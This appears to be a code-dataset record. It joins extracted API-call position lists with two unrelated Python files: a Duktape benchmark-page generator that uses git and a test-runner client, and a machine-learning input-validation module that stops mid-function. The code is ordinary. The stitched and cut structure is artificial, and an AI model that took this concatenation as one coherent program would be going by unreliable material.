doc_type=self.sessions_doc_type)\n', (25040, 25100), False, 'from mabed.es_connector import Es_connector\n'), ((25671, 25715), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': 'doc_type'}), '(index=index, doc_type=doc_type)\n', (25683, 25715), False, 'from mabed.es_connector import Es_connector\n'), ((25910, 25982), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (25922, 25982), False, 'from mabed.es_connector import Es_connector\n'), ((26263, 26335), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (26275, 26335), False, 'from mabed.es_connector import Es_connector\n'), ((26483, 26555), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (26495, 26555), False, 'from mabed.es_connector import Es_connector\n'), ((27438, 27481), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (27450, 27481), False, 'from mabed.es_connector import Es_connector\n'), ((27636, 27679), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (27648, 27679), False, 'from mabed.es_connector import Es_connector\n'), ((27754, 27779), 'json.loads', 'json.loads', (["data['event']"], {}), "(data['event'])\n", (27764, 27779), False, 'import json\n'), ((29535, 29578), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (29547, 29578), False, 'from mabed.es_connector import Es_connector\n'), ((30584, 30627), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (30596, 30627), False, 'from mabed.es_connector import Es_connector\n'), ((31228, 31271), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (31240, 31271), False, 'from mabed.es_connector import Es_connector\n'), ((31644, 31687), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (31656, 31687), False, 'from mabed.es_connector import Es_connector\n'), ((31958, 31983), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (31970, 31983), False, 'from mabed.es_connector import Es_connector\n'), ((32587, 32612), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (32599, 32612), False, 'from mabed.es_connector import Es_connector\n'), ((33455, 33480), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (33467, 33480), False, 'from mabed.es_connector import Es_connector\n'), ((34248, 34273), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (34260, 34273), False, 'from mabed.es_connector import Es_connector\n'), ((34722, 34747), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (34734, 34747), False, 'from mabed.es_connector import Es_connector\n'), ((35015, 35040), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35027, 35040), False, 'from mabed.es_connector import Es_connector\n'), ((35414, 35439), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35426, 35439), False, 'from mabed.es_connector import Es_connector\n'), ((35950, 35975), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (35962, 35975), False, 'from mabed.es_connector import Es_connector\n'), ((36502, 36527), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (36514, 36527), False, 'from mabed.es_connector import Es_connector\n'), ((36997, 37022), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (37009, 37022), False, 'from mabed.es_connector import Es_connector\n'), ((37230, 37255), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (37242, 37255), False, 'from mabed.es_connector import Es_connector\n'), ((37442, 37467), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (37454, 37467), False, 'from mabed.es_connector import Es_connector\n'), ((38360, 38385), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (38372, 38385), False, 'from mabed.es_connector import Es_connector\n'), ((39222, 39247), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (39234, 39247), False, 'from mabed.es_connector import Es_connector\n'), ((40612, 40637), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (40624, 40637), False, 'from mabed.es_connector import Es_connector\n'), ((42141, 42226), 'gensim.models.doc2vec.Doc2Vec', 'Doc2Vec', ([], {'vector_size': 'vec_size', 'alpha': 'alpha', 'min_alpha': '(0.00025)', 'min_count': '(1)', 'dm': '(1)'}), '(vector_size=vec_size, alpha=alpha, min_alpha=0.00025, min_count=1, dm=1\n )\n', (42148, 42226), False, 'from gensim.models.doc2vec import Doc2Vec, TaggedDocument\n'), ((1304, 1326), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1324, 1326), False, 'import timeit\n'), ((1635, 1657), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1655, 1657), False, 'import timeit\n'), ((1915, 1937), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1935, 1937), False, 'import timeit\n'), ((4578, 4600), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4598, 4600), False, 'import timeit\n'), ((4909, 4931), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4929, 4931), False, 'import timeit\n'), ((5189, 5211), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5209, 5211), False, 'import timeit\n'), ((20105, 20117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (20114, 20117), False, 'import json\n'), ((22197, 22209), 'json.load', 'json.load', (['f'], {}), '(f)\n', (22206, 22209), False, 'import json\n'), ((25368, 25411), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index', 'doc_type': '"""tweet"""'}), "(index=index, doc_type='tweet')\n", (25380, 25411), False, 'from mabed.es_connector import Es_connector\n'), ((26769, 26862), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': "session['_source']['s_index']", 'doc_type': "session['_source']['s_type']"}), "(index=session['_source']['s_index'], doc_type=session[\n '_source']['s_type'])\n", (26781, 26862), False, 'from mabed.es_connector import Es_connector\n'), ((3310, 3335), 'json.dumps', 'json.dumps', (['related_terms'], {}), '(related_terms)\n', (3320, 3335), False, 'import json\n'), ((6694, 6719), 'json.dumps', 'json.dumps', (['related_terms'], {}), '(related_terms)\n', (6704, 6719), False, 'import json\n')]
|
#!/usr/bin/env python2
import os
import sys
import re
import json
def main():
# Adapt manually.
duk = '/usr/local/bin/duk'
lzstring = '/home/duktape/duktape/lz-string/libs/lz-string.js'
duktape_repo = '/home/duktape/duktape'
duktape_testrunner_repo = '/home/duktape/duktape-testrunner'
duktape_testclient_config = '/home/duktape/duktape-testclient-config.yaml'
benchmarks_template = '/home/duktape/duktape/website/benchmarks.html'
merge_count = 1000
# Get the hashes we're interested in, in increasing merge order.
# os.system('cd %s && git pull --rebase' % duktape_repo)
os.system('cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt' % (duktape_repo, merge_count))
hashes = []
with open('/tmp/tmp-hashes.txt', 'rb') as f:
for line in f:
line = line.strip()
if line != '':
hashes.append(line)
hashes.reverse()
print('%d hashes found' % len(hashes))
# Get any release tags matching the hashes for annotations.
re_release_tag = re.compile('^v\d+\.\d+\.\d+$')
annotations = []
for x,h in enumerate(hashes):
os.system('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (duktape_repo, h))
with open('/tmp/tmp-taglog.txt', 'rb') as f:
for line in f:
line = line.strip()
m = re_release_tag.match(line)
if m is None:
continue
annotations.append({ 'x': x, 'tag': line })
print(json.dumps(annotations, indent=4))
# Get test data for hashed, and pack it into a JSON object embedded
# into the page.
req = { 'repo_full': 'svaarala/duktape', 'sha_list': hashes }
with open('/tmp/tmp-request.json', 'wb') as f:
f.write(json.dumps(req))
os.system('cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json' % (duktape_testrunner_repo, duktape_testclient_config))
with open('/tmp/tmp-result.json', 'rb') as f:
data = json.loads(f.read())
for commit in data:
for run in commit.get('runs', []):
# Censor some fields which take a lot of space
if run.has_key('output_uri'):
del run['output_uri']
if run.has_key('result') and run['result'].has_key('traceback'):
del run['result']['traceback']
doc = {
'commit_simples': data,
'annotations': annotations
}
with open('/tmp/tmp-graphdata.json', 'wb') as f:
f.write(json.dumps(doc))
# There's a lot of JSON data so use http://pieroxy.net/blog/pages/lz-string/index.html
# to compress it. 'duk' executable can be used to compress data.
with open('/tmp/tmp-script.js', 'wb') as f:
f.write('''
var input = new TextDecoder().decode(readFile('/tmp/tmp-graphdata.json'));
var compressed = LZString.compressToBase64(input);
writeFile('/tmp/tmp-graphdata-compressed.txt', compressed);
''')
os.system('%s %s /tmp/tmp-script.js' % (duk, lzstring))
with open('/tmp/tmp-graphdata-compressed.txt', 'rb') as f:
graphdata = f.read()
# Embed the compressed data into the benchmarks.html template.
with open(benchmarks_template, 'rb') as f:
page = f.read()
page = page.replace('<!-- @DATA@ -->', \
'var rawGraphDataCompressed = "' + graphdata + '";')
with open('/tmp/benchmarks.html', 'wb') as f:
f.write(page)
# Done!
print('done')
if __name__ == '__main__':
main()
|
[
"os.system",
"json.dumps",
"re.compile"
] |
[((620, 770), 'os.system', 'os.system', (["('cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt'\n % (duktape_repo, merge_count))"], {}), "(\n 'cd %s && git log -n %d --merges --oneline --decorate=no --pretty=format:%%H > /tmp/tmp-hashes.txt'\n % (duktape_repo, merge_count))\n", (629, 770), False, 'import os\n'), ((1095, 1130), 're.compile', 're.compile', (['"""^v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""'], {}), "('^v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$')\n", (1105, 1130), False, 'import re\n'), ((1856, 2103), 'os.system', 'os.system', (["('cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json'\n % (duktape_testrunner_repo, duktape_testclient_config))"], {}), "(\n 'cd %s && cd client-simple-node && nodejs client.js --request-uri /query-commit-simple --config %s --request-file /tmp/tmp-request.json --output-file /tmp/tmp-result.json'\n % (duktape_testrunner_repo, duktape_testclient_config))\n", (1865, 2103), False, 'import os\n'), ((3138, 3193), 'os.system', 'os.system', (["('%s %s /tmp/tmp-script.js' % (duk, lzstring))"], {}), "('%s %s /tmp/tmp-script.js' % (duk, lzstring))\n", (3147, 3193), False, 'import os\n'), ((1189, 1283), 'os.system', 'os.system', (["('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (duktape_repo, h)\n )"], {}), "('cd %s && git tag -l --points-at %s > /tmp/tmp-taglog.txt' % (\n duktape_repo, h))\n", (1198, 1283), False, 'import os\n'), ((1571, 1604), 'json.dumps', 'json.dumps', (['annotations'], {'indent': '(4)'}), '(annotations, indent=4)\n', (1581, 1604), False, 'import json\n'), ((1834, 1849), 'json.dumps', 'json.dumps', (['req'], {}), '(req)\n', (1844, 1849), False, 'import json\n'), ((2695, 2710), 'json.dumps', 'json.dumps', (['doc'], {}), '(doc)\n', (2705, 2710), False, 'import json\n')]
|
import copy
import warnings
from collections.abc import Iterable
from inspect import Parameter, signature
import numpy as np
from sklearn.utils.validation import (
check_array,
column_or_1d,
assert_all_finite,
check_consistent_length,
check_random_state as check_random_state_sklearn,
)
from ._label import MISSING_LABEL, check_missing_label, is_unlabeled
def check_scalar(
x,
name,
target_type,
min_inclusive=True,
max_inclusive=True,
min_val=None,
max_val=None,
):
"""Validate scalar parameters type and value.
Parameters
----------
x : object
The scalar parameter to validate.
name : str
The name of the parameter to be printed in error messages.
target_type : type or tuple
Acceptable data types for the parameter.
min_val : float or int, optional (default=None)
The minimum valid value the parameter can take. If None (default) it
is implied that the parameter does not have a lower bound.
min_inclusive : bool, optional (default=True)
If true, the minimum valid value is inclusive, otherwise exclusive.
max_val : float or int, optional (default=None)
The maximum valid value the parameter can take. If None (default) it
is implied that the parameter does not have an upper bound.
max_inclusive : bool, optional (default=True)
If true, the maximum valid value is inclusive, otherwise exclusive.
Raises
-------
TypeError
If the parameter's type does not match the desired type.
ValueError
If the parameter's value violates the given bounds.
"""
if not isinstance(x, target_type):
raise TypeError(
"`{}` must be an instance of {}, not {}.".format(
name, target_type, type(x)
)
)
if min_inclusive:
if min_val is not None and x < min_val:
raise ValueError(
"`{}`= {}, must be >= " "{}.".format(name, x, min_val)
)
else:
if min_val is not None and x <= min_val:
raise ValueError(
"`{}`= {}, must be > " "{}.".format(name, x, min_val)
)
if max_inclusive:
if max_val is not None and x > max_val:
raise ValueError(
"`{}`= {}, must be <= " "{}.".format(name, x, max_val)
)
else:
if max_val is not None and x >= max_val:
raise ValueError(
"`{}`= {}, must be < " "{}.".format(name, x, max_val)
)
def check_classifier_params(classes, missing_label, cost_matrix=None):
"""Check whether the parameters are compatible to each other (only if
`classes` is not None).
Parameters
----------
classes : array-like, shape (n_classes)
Array of class labels.
missing_label : {number, str, None, np.nan}
Symbol to represent a missing label.
cost_matrix : array-like, shape (n_classes, n_classes), default=None
Cost matrix. If None, cost matrix will be not checked.
"""
check_missing_label(missing_label)
if classes is not None:
check_classes(classes)
dtype = np.array(classes).dtype
check_missing_label(missing_label, target_type=dtype, name="classes")
n_labeled = is_unlabeled(y=classes, missing_label=missing_label).sum()
if n_labeled > 0:
raise ValueError(
f"`classes={classes}` contains "
f"`missing_label={missing_label}.`"
)
if cost_matrix is not None:
check_cost_matrix(cost_matrix=cost_matrix, n_classes=len(classes))
else:
if cost_matrix is not None:
raise ValueError(
"You cannot specify 'cost_matrix' without "
"specifying 'classes'."
)
def check_classes(classes):
"""Check whether class labels are uniformly strings or numbers.
Parameters
----------
classes : array-like, shape (n_classes)
Array of class labels.
"""
if not isinstance(classes, Iterable):
raise TypeError(
"'classes' is not iterable. Got {}".format(type(classes))
)
try:
classes_sorted = np.array(sorted(set(classes)))
if len(classes) != len(classes_sorted):
raise ValueError("Duplicate entries in 'classes'.")
except TypeError:
types = sorted(t.__qualname__ for t in set(type(v) for v in classes))
raise TypeError(
"'classes' must be uniformly strings or numbers. Got {}".format(
types
)
)
def check_class_prior(class_prior, n_classes):
"""Check if the class_prior is a valid prior.
Parameters
----------
class_prior : numeric | array_like, shape (n_classes)
A class prior.
n_classes : int
The number of classes.
Returns
-------
class_prior : np.ndarray, shape (n_classes)
Numpy array as prior.
"""
if class_prior is None:
raise TypeError("'class_prior' must not be None.")
check_scalar(n_classes, name="n_classes", target_type=int, min_val=1)
if np.isscalar(class_prior):
check_scalar(
class_prior,
name="class_prior",
target_type=(int, float),
min_val=0,
)
class_prior = np.array([class_prior] * n_classes)
else:
class_prior = check_array(class_prior, ensure_2d=False)
is_negative = np.sum(class_prior < 0)
if class_prior.shape != (n_classes,) or is_negative:
raise ValueError(
"`class_prior` must be either a non-negative"
"float or a list of `n_classes` non-negative "
"floats."
)
return class_prior.reshape(-1)
def check_cost_matrix(
cost_matrix,
n_classes,
only_non_negative=False,
contains_non_zero=False,
diagonal_is_zero=False,
):
"""Check whether cost matrix has shape `(n_classes, n_classes)`.
Parameters
----------
cost_matrix : array-like, shape (n_classes, n_classes)
Cost matrix.
n_classes : int
Number of classes.
only_non_negative : bool, optional (default=True)
This parameter determines whether the matrix must contain only non
negative cost entries.
contains_non_zero : bool, optional (default=True)
This parameter determines whether the matrix must contain at least on
non-zero cost entry.
diagonal_is_zero : bool, optional (default=True)
This parameter determines whether the diagonal cost entries must be
zero.
Returns
-------
cost_matrix_new : np.ndarray, shape (n_classes, n_classes)
Numpy array as cost matrix.
"""
check_scalar(n_classes, target_type=int, name="n_classes", min_val=1)
cost_matrix_new = check_array(
np.array(cost_matrix, dtype=float), ensure_2d=True
)
if cost_matrix_new.shape != (n_classes, n_classes):
raise ValueError(
"'cost_matrix' must have shape ({}, {}). "
"Got {}.".format(n_classes, n_classes, cost_matrix_new.shape)
)
if np.sum(cost_matrix_new < 0) > 0:
if only_non_negative:
raise ValueError(
"'cost_matrix' must contain only non-negative cost entries."
)
else:
warnings.warn("'cost_matrix' contains negative cost entries.")
if n_classes != 1 and np.sum(cost_matrix_new != 0) == 0:
if contains_non_zero:
raise ValueError(
"'cost_matrix' must contain at least one non-zero cost "
"entry."
)
else:
warnings.warn(
"'cost_matrix' contains contains no non-zero cost entry."
)
if np.sum(np.diag(cost_matrix_new) != 0) > 0:
if diagonal_is_zero:
raise ValueError(
"'cost_matrix' must contain only cost entries being zero on "
"its diagonal."
)
else:
warnings.warn(
"'cost_matrix' contains non-zero cost entries on its diagonal."
)
return cost_matrix_new
def check_X_y(
X=None,
y=None,
X_cand=None,
sample_weight=None,
sample_weight_cand=None,
accept_sparse=False,
*,
accept_large_sparse=True,
dtype="numeric",
order=None,
copy=False,
force_all_finite=True,
ensure_2d=True,
allow_nd=False,
multi_output=False,
allow_nan=None,
ensure_min_samples=1,
ensure_min_features=1,
y_numeric=False,
estimator=None,
missing_label=MISSING_LABEL,
):
"""Input validation for standard estimators.
Checks X and y for consistent length, enforces X to be 2D and y 1D. By
default, X is checked to be non-empty and containing only finite values.
Standard input checks are also applied to y, such as checking that y
does not have np.nan or np.inf targets. For multi-label y, set
multi_output=True to allow 2D and sparse y. If the dtype of X is
object, attempt converting to float, raising on failure.
Parameters
----------
X : nd-array, list or sparse matrix
Labeled input data.
y : nd-array, list or sparse matrix
Labels for X.
X_cand : nd-array, list or sparse matrix (default=None)
Unlabeled input data
sample_weight : array-like of shape (n_samples,) (default=None)
Sample weights.
sample_weight_cand : array-like of shape (n_candidates,) (default=None)
Sample weights of the candidates.
accept_sparse : string, boolean or list of string (default=False)
String[s] representing allowed sparse matrix formats, such as 'csc',
'csr', etc. If the input is sparse but not in the allowed format,
it will be converted to the first listed format. True allows the input
to be any format. False means that a sparse matrix input will
raise an error.
accept_large_sparse : bool (default=True)
If a CSR, CSC, COO or BSR sparse matrix is supplied and accepted by
accept_sparse, accept_large_sparse will cause it to be accepted only
if its indices are stored with a 32-bit dtype.
.. versionadded:: 0.20
dtype : string, type, list of types or None (default="numeric")
Data type of result. If None, the dtype of the input is preserved.
If "numeric", dtype is preserved unless array.dtype is object.
If dtype is a list of types, conversion on the first type is only
performed if the dtype of the input is not in the list.
order : 'F', 'C' or None (default=None)
Whether an array will be forced to be fortran or c-style.
copy : boolean (default=False)
Whether a forced copy will be triggered. If copy=False, a copy might
be triggered by a conversion.
force_all_finite : boolean or 'allow-nan', (default=True)
Whether to raise an error on np.inf, np.nan, pd.NA in X. This parameter
does not influence whether y can have np.inf, np.nan, pd.NA values.
The possibilities are:
- True: Force all values of X to be finite.
- False: accepts np.inf, np.nan, pd.NA in X.
- 'allow-nan': accepts only np.nan or pd.NA values in X. Values cannot
be infinite.
.. versionadded:: 0.20
``force_all_finite`` accepts the string ``'allow-nan'``.
.. versionchanged:: 0.23
Accepts `pd.NA` and converts it into `np.nan`
ensure_2d : boolean (default=True)
Whether to raise a value error if X is not 2D.
allow_nd : boolean (default=False)
Whether to allow X.ndim > 2.
multi_output : boolean (default=False)
Whether to allow 2D y (array or sparse matrix). If false, y will be
validated as a vector. y cannot have np.nan or np.inf values if
multi_output=True.
allow_nan : boolean (default=None)
Whether to allow np.nan in y.
ensure_min_samples : int (default=1)
Make sure that X has a minimum number of samples in its first
axis (rows for a 2D array).
ensure_min_features : int (default=1)
Make sure that the 2D array has some minimum number of features
(columns). The default value of 1 rejects empty datasets.
This check is only enforced when X has effectively 2 dimensions or
is originally 1D and ``ensure_2d`` is True. Setting to 0 disables
this check.
y_numeric : boolean (default=False)
Whether to ensure that y has a numeric type. If dtype of y is object,
it is converted to float64. Should only be used for regression
algorithms.
estimator : str or estimator instance (default=None)
If passed, include the name of the estimator in warning messages.
missing_label : {scalar, string, np.nan, None}, (default=np.nan)
Value to represent a missing label.
Returns
-------
X_converted : object
The converted and validated X.
y_converted : object
The converted and validated y.
candidates : object
The converted and validated candidates
Only returned if candidates is not None.
sample_weight : np.ndarray
The converted and validated sample_weight.
sample_weight_cand : np.ndarray
The converted and validated sample_weight_cand.
Only returned if candidates is not None.
"""
if allow_nan is None:
allow_nan = True if missing_label is np.nan else False
if X is not None:
X = check_array(
X,
accept_sparse=accept_sparse,
accept_large_sparse=accept_large_sparse,
dtype=dtype,
order=order,
copy=copy,
force_all_finite=force_all_finite,
ensure_2d=ensure_2d,
allow_nd=allow_nd,
ensure_min_samples=ensure_min_samples,
ensure_min_features=ensure_min_features,
estimator=estimator,
)
if y is not None:
if multi_output:
y = check_array(
y,
accept_sparse="csr",
force_all_finite=True,
ensure_2d=False,
dtype=None,
)
else:
y = column_or_1d(y, warn=True)
assert_all_finite(y, allow_nan=allow_nan)
if y_numeric and y.dtype.kind == "O":
y = y.astype(np.float64)
if X is not None and y is not None:
check_consistent_length(X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape)
sample_weight = check_array(sample_weight, ensure_2d=False)
check_consistent_length(y, sample_weight)
if (
y.ndim > 1
and y.shape[1] > 1
or sample_weight.ndim > 1
and sample_weight.shape[1] > 1
):
check_consistent_length(y.T, sample_weight.T)
if X_cand is not None:
X_cand = check_array(
X_cand,
accept_sparse=accept_sparse,
accept_large_sparse=accept_large_sparse,
dtype=dtype,
order=order,
copy=copy,
force_all_finite=force_all_finite,
ensure_2d=ensure_2d,
allow_nd=allow_nd,
ensure_min_samples=ensure_min_samples,
ensure_min_features=ensure_min_features,
estimator=estimator,
)
if X is not None and X_cand.shape[1] != X.shape[1]:
raise ValueError(
"The number of features of candidates does not match"
"the number of features of X"
)
if sample_weight_cand is None:
sample_weight_cand = np.ones(len(X_cand))
sample_weight_cand = check_array(sample_weight_cand, ensure_2d=False)
check_consistent_length(X_cand, sample_weight_cand)
if X_cand is None:
return X, y, sample_weight
else:
return X, y, X_cand, sample_weight, sample_weight_cand
def check_random_state(random_state, seed_multiplier=None):
"""Check validity of the given random state.
Parameters
----------
random_state : None | int | instance of RandomState
If random_state is None, return the RandomState singleton used by
np.random.
If random_state is an int, return a new RandomState.
If random_state is already a RandomState instance, return it.
Otherwise raise ValueError.
seed_multiplier : None | int, optional (default=None)
If the random_state and seed_multiplier are not None, draw a new int
from the random state, multiply it with the multiplier, and use the
product as the seed of a new random state.
Returns
-------
random_state: instance of RandomState
The validated random state.
"""
if random_state is None or seed_multiplier is None:
return check_random_state_sklearn(random_state)
check_scalar(
seed_multiplier, name="seed_multiplier", target_type=int, min_val=1
)
random_state = copy.deepcopy(random_state)
random_state = check_random_state_sklearn(random_state)
seed = (random_state.randint(1, 2**31) * seed_multiplier) % (2**31)
return np.random.RandomState(seed)
def check_indices(indices, A, dim="adaptive", unique=True):
"""Check if indices fit to array.
Parameters
----------
indices : array-like of shape (n_indices, n_dim) or (n_indices,)
The considered indices, where for every `i = 0, ..., n_indices - 1`
`indices[i]` is interpreted as an index to the array `A`.
A : array-like
The array that is indexed.
dim : int or tuple of ints
The dimensions of the array that are indexed.
If `dim` equals `'adaptive'`, `dim` is set to first indices
corresponding to the shape of `indices`. E.g., if `indices` is of
shape (n_indices,), `dim` is set `0`.
unique: bool or `check_unique`
If `unique` is `True` unique indices are returned. If `unique` is
`'check_unique'` an exception is raised if the indices are not unique.
Returns
-------
indices: tuple of np.ndarrays or np.ndarray
The validated indices.
"""
indices = check_array(indices, dtype=int, ensure_2d=False)
A = check_array(A, allow_nd=True, force_all_finite=False, ensure_2d=False)
if unique == "check_unique":
if indices.ndim == 1:
n_unique_indices = len(np.unique(indices))
else:
n_unique_indices = len(np.unique(indices, axis=0))
if n_unique_indices < len(indices):
raise ValueError(
f"`indices` contains two different indices of the "
f"same value."
)
elif unique:
if indices.ndim == 1:
indices = np.unique(indices)
else:
indices = np.unique(indices, axis=0)
check_type(dim, "dim", int, tuple, target_vals=["adaptive"])
if dim == "adaptive":
if indices.ndim == 1:
dim = 0
else:
dim = tuple(range(indices.shape[1]))
if isinstance(dim, tuple):
for n in dim:
check_type(n, "entry of `dim`", int)
if A.ndim <= max(dim):
raise ValueError(
f"`dim` contains entry of value {max(dim)}, but all"
f"entries of dim must be smaller than {A.ndim}."
)
if len(dim) != indices.shape[1]:
raise ValueError(
f"shape of `indices` along dimension 1 is "
f"{indices.shape[0]}, but must be {len(dim)}"
)
indices = tuple(indices.T)
for (i, n) in enumerate(indices):
if np.any(indices[i] >= A.shape[dim[i]]):
raise ValueError(
f"`indices[{i}]` contains index of value "
f"{np.max(indices[i])} but all indices must be"
f" less than {A.shape[dim[i]]}."
)
return indices
else:
if A.ndim <= dim:
raise ValueError(
f"`dim` has value {dim}, but must be smaller than "
f"{A.ndim}."
)
if np.any(indices >= A.shape[dim]):
raise ValueError(
f"`indices` contains index of value "
f"{np.max(indices)} but all indices must be"
f" less than {A.shape[dim]}."
)
return indices
def check_type(
obj, name, *target_types, target_vals=None, indicator_funcs=None
):
"""Check if obj is one of the given types. It is also possible to allow
specific values. Further it is possible to pass indicator functions
that can also accept obj. Thereby obj must either have a correct type
a correct value or be accepted by an indicator function.
Parameters
----------
obj: object
The object to be checked.
name: str
The variable name of the object.
target_types : iterable
The possible types.
target_vals : iterable, optional (default=None)
Possible further values that the object is allowed to equal.
indicator_funcs : iterable, optional (default=None)
Possible further custom indicator (boolean) functions that accept
the object by returning `True` if the object is passed as a parameter.
"""
target_vals = target_vals if target_vals is not None else []
indicator_funcs = indicator_funcs if indicator_funcs is not None else []
wrong_type = not isinstance(obj, target_types)
wrong_value = obj not in target_vals
wrong_index = all(not i_func(obj) for i_func in indicator_funcs)
if wrong_type and wrong_value and wrong_index:
error_str = f"`{name}` "
if len(target_types) == 0 and len(target_vals) == 0:
error_str += f" must"
if len(target_vals) == 0 and len(target_types) > 0:
error_str += f" has type `{type(obj)}`, but must"
elif len(target_vals) > 0 and len(target_types) == 0:
error_str += f" has value `{obj}`, but must"
else:
error_str += f" has type `{type(obj)}` and value `{obj}`, but must"
if len(target_types) == 1:
error_str += f" have type `{target_types[0]}`"
elif 1 <= len(target_types) <= 3:
error_str += " have type"
for i in range(len(target_types) - 1):
error_str += f" `{target_types[i]}`,"
error_str += f" or `{target_types[len(target_types) - 1]}`"
elif len(target_types) > 3:
error_str += (
f" have one of the following types: {set(target_types)}"
)
if len(target_vals) > 0:
if len(target_types) > 0 and len(indicator_funcs) == 0:
error_str += " or"
elif len(target_types) > 0 and len(indicator_funcs) > 0:
error_str += ","
error_str += (
f" equal one of the following values: {set(target_vals)}"
)
if len(indicator_funcs) > 0:
if len(target_types) > 0 or len(target_vals) > 0:
error_str += " or"
error_str += (
f" be accepted by one of the following custom boolean "
f"functions: {set(i_f.__name__ for i_f in indicator_funcs)}"
)
raise TypeError(error_str + ".")
def check_callable(func, name, n_free_parameters=None):
"""Checks if function is a callable and if the number of free parameters is
correct.
Parameters
----------
func: callable
The functions to be validated.
name: str
The name of the function
n_free_parameters: int, optional (default=None)
The number of free parameters. If `n_free_parameters` is `None`,
`n_free_parameters` is set to `1`.
"""
if n_free_parameters is None:
n_free_parameters = 1
if not callable(func):
raise TypeError(
f"`{name}` must be callable. " f"`{name}` is of type {type(func)}"
)
# count the number of arguments that have no default value
n_free_params = len(
list(
filter(
lambda x: x.default == Parameter.empty,
signature(func).parameters.values(),
)
)
)
if n_free_params != n_free_parameters:
raise ValueError(
f"The number of free parameters of the callable has to "
f"equal {n_free_parameters}. "
f"The number of free parameters is {n_free_params}."
)
def check_bound(
bound=None, X=None, ndim=2, epsilon=0, bound_must_be_given=False
):
"""Validates bound and returns the bound of X if bound is None.
`bound` or `X` must not be None.
Parameters
----------
bound: array-like, shape (2, ndim), optional (default=None)
The given bound of shape
[[x1_min, x2_min, ..., xndim_min], [x1_max, x2_max, ..., xndim_max]]
X: matrix-like, shape (n_samples, ndim), optional (default=None)
The sample matrix X is the feature matrix representing samples.
ndim: int, optional (default=2)
The number of dimensions.
epsilon: float, optional (default=0)
The minimal distance between the returned bound and the values of `X`,
if `bound` is not specified.
bound_must_be_given: bool, optional (default=False)
Whether it is allowed for the bound to be `None` and to be inferred by
`X`.
Returns
-------
bound: array-like, shape (2, ndim), optional (default=None)
The given bound or bound of X.
"""
if X is not None:
X = check_array(X)
if X.shape[1] != ndim:
raise ValueError(
f"`X` along axis 1 must be of length {ndim}. "
f"`X` along axis 1 is of length {X.shape[1]}."
)
if bound is not None:
bound = check_array(bound)
if bound.shape != (2, ndim):
raise ValueError(
f"Shape of `bound` must be (2, {ndim}). "
f"Shape of `bound` is {bound.shape}."
)
elif bound_must_be_given:
raise ValueError("`bound` must not be `None`.")
if bound is None and X is not None:
minima = np.nanmin(X, axis=0) - epsilon
maxima = np.nanmax(X, axis=0) + epsilon
